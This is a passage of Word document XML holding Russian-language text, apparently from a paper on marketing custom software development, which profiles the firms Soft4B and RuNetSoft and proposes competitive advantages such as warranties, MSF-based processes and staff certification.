      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Компания Soft4B. Компания Soft4B позиционирует себя как узкоспециализированный разработчик программного обеспечения для решений малой автоматизации, расширяющих функциональность продуктов MicrosoftOffice. Большнство решений имеет бюджет от 300 т.р. до 1 млн. руб., однако среди клиентов компании крупные российские как коммерческие, так и государственные предприятия. Компания предоставляет полный цикл разработки программ:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>анализ, моделирование и оптимизация бизнес-процессов;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>составление технического задания;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>разработку программ и баз данных на заказ;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>разработку цуи-приложений, решений для e-commerce;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>автоматизацию предприятий;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>внедрение и поддержка разработанного ПО;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>продажу сопутствующего лицензионного программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Продвижение услуг. Основа продвижения услуг компании во многом схожа с компанией FastSoft и основана в первую очередь на известных заказчиках. Также компания провела сертификацию своих специалистов в системе MicrosoftCertifiedProfessional, что позволяет ей заявлять о высокой квалификации специалистов принимающих участие в разработке.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Узкая специализация. Компания позиционирует себя как узкоспециализированного разработчика небольших баз данных и решений для офисной автоматизации, который при этом может предложить заказчику ряд отсутствующих у конкурентов преимуществ, которые будут рассмотрены ниже.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Фиксированные сроки и стоимость разработки. Компания заявляет фиксированные сроки и фиксированную стоимость разработки продуктов, что снимает с клиента часть рисков, рассмотренных в п. 2.3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Готовые компоненты, ценообразование и сроки. Отдельные часто востребованные клиентами решения, например, система учета клиентов или учет сотрудников компания предлагает в виде готовых модулей, которые могут быть встроены в решение, которое заказывает клиент с оплатой по фиксированной ставке.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При этом фиксированная ставка значительно ниже стоимости разработки такого компонента “с нуля”, также сокращаются и сроки разработки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Компания RuNetSoft. КомпаияRuNetSoft является поставщиком комплексных услуг на рынке информационных технологий. Услуги, оказываемые компанией, охватывают весь спектр потребностей клиентов среднего бизнеса - от разработки сайтов до создания сложных информационных систем и поставки оборудования ведущих мировых производителей. Среди клиентов компании: ЗАО </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Фармакор</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, ЗАО </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Авик-Тайм</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, Объединенная Финансовая Промышленная Страховая Компания, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HomeWork</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - educationservices, Аудио-Видео Санкт-Петербург, Агентство недвижимости </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ПетербургРент</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и многие другие известные коммерческие компании.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Продвижение услуг. Компания RuNetSoft позиционирует себя как серьезного разработчика программного обеспечения, нацеленного на долгосрочные отношения с клиентом. Рассмотрим основы стратегии продвижения услуг, которые использует компания:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основа цикла разработки – промышленные стандарты</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Компания RuNetSoft объявляет об использовании в процессе разработки и внедрения программного обеспечения модели процессов MSF (MicrosoftSolutionFramework), которая включает этапы:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>предпроектного исследования,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>разработки спецификаций,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>планирования, проектирования,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>разработки, тестирования,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>стабилизации и развертывания.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Бесплатное гарантийное обслуживание</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Компания предоставляет клиентам бесплатное гарантийное обслуживание сроком на два года. Этот шаг, безусловно, позволяет сформировать имидж компании, как надежного партнера в глазах потенциальных клиентов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Предоставление всего комплекса услуг</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Компания RuNetSoft предлагает своим клиентам весь цикл разработки решений, начиная с анализа предметной области и проектирования продукта до непосредственно разработки и внедрения продукта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для клиента такая модель позволяет не только снизить риски и сократить сроки разработки и внедрения, но также снимает вопросы, связанные с взаимодействием нескольких подрядных организаций.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Предоставление всего комплекса услуг</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Создание конкурентных преимуществ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В предыдущих частях работы были рассмотрены основные потребности клиентов, а также риски, которые несет каждая из сторон при разработке программного обеспечения под заказ. Также рассмотрена практика продвижения услуг несколькими конкретными компаниями. В данной части работы будут предложены меры, направленные на создание очевидных для клиента конкурентных преимуществ перед другими компаниями отрасли.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Прозрачные взаимоотношения с заказчиком</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Одно из основных конкурентных преимуществ, которые привлекают заказчика на этом рынке – прозрачные отношения заказчика и исполнителя с четким разграничением всех возникающих рисков.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таким образом, например, возможно использование на усмотрение заказчика одной из нескольких схем взаимодействия, в том числе, предусматривающих четкие ограничения по срокам разработки, при использовании модели процессов MSF (MicrosoftSolutionFramework), которая включает этапы: предпроектного исследования, разработки спецификаций, планирования, проектирования, разработки, тестирования, стабилизации и развертывания.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При этом между заказчиком и исполнителем в качестве базового документа используется не техническое задание, описывающее внутреннюю архитектуру продукта, а функциональная спецификация, которая оговаривает требования только к функциональности продукта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Учитывая, что в данном случае проектирование продукта фактически выполняется исполнителем, риски от неверного проектирования могут быть минимизированы, а многие проектные ошибки с меньшими затратами устранены на этапе разработки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Безусловно, такой процесс разработки обходится значительно дороже, но зачастую он более предпочтителен, так как позволяет снять с заказчика существенную часть рисков.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Использование отраслевых стандартов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сертификация собственных специалистов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сертификация собственных специалистов в системах профессиональной сертификации ведущих производителей (например, Microsoft) позволяет заявить потенциальным заказчикам, что разработка и проектирование программного обеспечения производится высококвалифицированными специалистами, что позволяет повысить уверенность потенциальных клиентов в качестве таких услуг.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Гарантия на поставляемые продукты</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Наличие длительных сроков бесплатного гарантийного обслуживания разработанных программных продуктов позволит повысить доверие потенциального заказчика к исполнителю, т.к. заказчик в данном случае может избежать существенной части рисков, которые он может понести на этапе внедрения продукта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Дополнительные риски исполнителя</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Необходимо отметить, что эта мера накладывает на исполнителя существенные дополнительные риски, которые связаны с тем, что ошибки, выявленные в разработанном продукте могут потребовать от исполнителя существенных затрат на их устранение.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вместе с тем, во-первых, данная мера практически не накладывает дополнительных издержек при разработке однотипных, небольших и узкоспециализированных решений ввиду низкой проектной сложности, но вместе с тем позволяет существенно повысить репутацию компании-исполнителя.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>С другой стороны, стоимость разработки при наличии бесплатного гарантийного обслуживания может быть несколько больше, вместе с тем сам факт его наличия позволит сохранить привлекательность для потенциальных заказчиков.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Успешные заказы от известных компаний</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Несомненно, ключевым фактором, определяющим принятие заказчиком решения о выборе того или иного исполнителя при размещении очередного заказа является наличие у него ранее успешного опыта работы с этим исполнителем, либо наличие у исполнителя большого числа успешно выполненных заказов от известных компаний.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При этом необходимо отметить и негативную составляющую: наличие хотя бы одного-двух проблемных заказов от крупных компаний, информация о которых попадает в широкие массы, может окончательно испортить репутацию компании, специализирующейся на разработке программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Дополнительные услуги по проектированию продукта</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Во многих случаях потенциальный заказчик не желает брать на себя риски, связанные с проектированием (либо участии в проектировании) крупного программного продукта. Необходимо учесть, что при недостатках начальных этапов проектирования и определения потребностей в тех или иных функциях продукта разработанных программный продукт формально может соответствовать функциональной спецификации, но при этом, например, иметь ряд очевидных функциональных недостатков, препятствующих его использованию по прямому назначению.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
